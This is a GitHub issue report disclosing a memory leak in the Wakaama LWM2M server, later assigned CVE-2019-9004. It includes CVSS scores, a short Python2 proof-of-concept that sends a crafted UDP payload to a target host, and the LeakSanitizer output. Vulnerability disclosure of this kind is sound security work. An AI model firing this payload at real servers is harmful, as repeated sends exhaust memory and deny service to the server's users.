eclipse-wakaama/wakaama

Memory leak while processing crafted packet

Closed this issue · 1 comments

cve-reporting commented

Wakaama LWM2M server incorrectly handles incoming packets leading to a memory leak.
Processing of the single crafted packet leads to leaking (wasting) 24 bytes of memory.
This can lead to stopping of the LWM2M server after exhausting all available memory.
Depending on server configuration and isolation of services, this can stop also other processes on the same server.

Proposed CVSS 3.0 Score:

On systems with modern memory protection and isolation of services:
5.3 (medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

On systems with lower memory protection and no isolation of services:
7.5 (high) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Reproduction:

  1. Wakaama must be compiled with Leak Sanitizer (or other similar tool) by setting compilation flag:
    C_FLAGS = -fsanitize=address

  2. Run Wakaama server as:
    lwm2mserver -4 -l 55555

  3. Run following Python2 script (running multiple times will show larger leak):

    import sys
    import socket

    WAKAAMA_PAYLOAD = "4402e6e2e2e68167b2726411"
    out_data = WAKAAMA_PAYLOAD.decode('hex')
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM )
    s.sendto(out_data, (sys.argv[1], int(sys.argv[2])))

    Execution of the script:

    python2 wakaama_test.py dst_ip dst_port
    (where: dst_ip and dst_port are IP and port of tested Wakaama server)
    e.g.:
    sudo python wakaama_test.py 192.168.0.101 55555

  4. Close the lwm2mserver to get report from Leak Sanitizer:

    12 bytes received from [....]:....
    44 02 E6 E2 E2 E6 81 67 B2 72 64 11 D......g.rd.
    ^C
    =================================================================
    ==19153==ERROR: LeakSanitizer: detected memory leaks

    Direct leak of 24 byte(s) in 1 object(s) allocated from:
    #0 0x7f4fa293b602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42f1df in lwm2m_malloc (/wakaama-master/build_asan/lwm2mserver+0x42f1df)
    #2 0x425ad6 in coap_add_multi_option (/wakaama-master/build_asan/lwm2mserver+0x425ad6)
    #3 0x42910f in coap_parse_message (/wakaama-master/build_asan/lwm2mserver+0x42910f)
    #4 0x412aac in lwm2m_handle_packet (/wakaama-master/build_asan/lwm2mserver+0x412aac)
    #5 0x4088e2 in main (/wakaama-master/build_asan/lwm2mserver+0x4088e2)
    #6 0x7f4fa24f982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

    SUMMARY: AddressSanitizer: 24 byte(s) leaked in 1 allocation(s).

cve-reporting commented

For this vulnerability following ID was assigned: CVE-2019-9004